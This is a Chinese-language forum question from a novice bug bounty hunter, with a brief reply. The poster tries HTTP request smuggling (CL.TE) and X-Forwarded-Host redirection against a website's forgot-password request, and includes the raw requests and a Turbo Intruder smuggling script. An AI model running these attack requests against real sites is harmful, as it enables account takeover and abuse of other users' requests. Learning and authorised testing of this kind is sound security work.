我是一名漏洞赏金猎人,而且刚刚接触它。几天前,我读到了“请求走私”漏洞。就在那之后,我开始在互联网上查找它。昨天,我发现一个网站,当我将 X-Forwarded-Host: google.com
添加到标题时,它会将我重定向到
https://www.google.com。利用这一点非常困难,所以我考虑将其与请求走私结合起来。我选择更改密码请求作为目标:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
我将其转换为分块:
POST /my-rx/forgot-password HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.example.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
Connection: close
Cookie: <my_cookie>
Upgrade-Insecure-Requests: 1
Transfer-Encoding: chunked
6b
email=mymail%40gmail.com&submit=Reset+My+Password&csrf_token=cb5a82b3df1e45c7b95d25edb46cfbf3
0
但是当我发送它时,它给了我
503 client read error
代码。看起来它不接受
chunked。但是,我仍然想继续,所以我在 Burp Suite 上下载了 HTTP Request Smuggler 和 Turbo Intruder 扩展。然后我进行走私攻击(CL.TE)。它给出了走私攻击的Python代码:
# if you edit this file, ensure you keep the line endings as CRLF or you'll have a bad time
def queueRequests(target, wordlists):
# to use Burp's HTTP stack for upstream proxy rules etc, use engine=Engine.BURP
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=5,
requestsPerConnection=1,
resumeSSL=False,
timeout=10,
pipeline=False,
maxRetriesPerRequest=0,
engine=Engine.THREADED,
)
# This will prefix the victim's request. Edit it to achieve the desired effect.
prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''
# The request engine will auto-fix the content-length for us
attack = target.req + prefix
engine.queue(attack)
victim = target.req
for i in range(14):
engine.queue(victim)
time.sleep(0.05)
def handleResponse(req, interesting):
table.add(req)
然后我使用Turbo Intruder
运行它。我很惊讶,它发送了 14 个请求,但只有 12 个请求是503
,剩下 2 个是
200
。特别的是,在 200
响应头中,它有 ...transfer-encoding: chunked...
。我尝试了几次,结果都是一样:1 或 2 个请求是200
。但这里有些奇怪,在代码中,它是...prefix = '''GET /hopefully404 HTTP/1.1
X-Ignore: X'''...
。经过几次测试,我认为这不是请求走私错误,因为响应显示它是原始请求的响应,而不是代码中的prefix
(我也尝试过更改prefix
,但它仍然是200
)
,不是 400
,404
,...如我所料)。那么有没有人(必须是非常专业的黑客)知道我面临什么漏洞?谢谢!
TE;CL
中分块,但在使用 burp 扩展后,您发现它的
CL;TE
,所以问题可能就在那里。
与您的回答一样,您有点困惑,我建议您解决 portswigger http 请求走私实验室,因为我最近已经完成了该实验室,通过它您的基础知识将变得非常强大!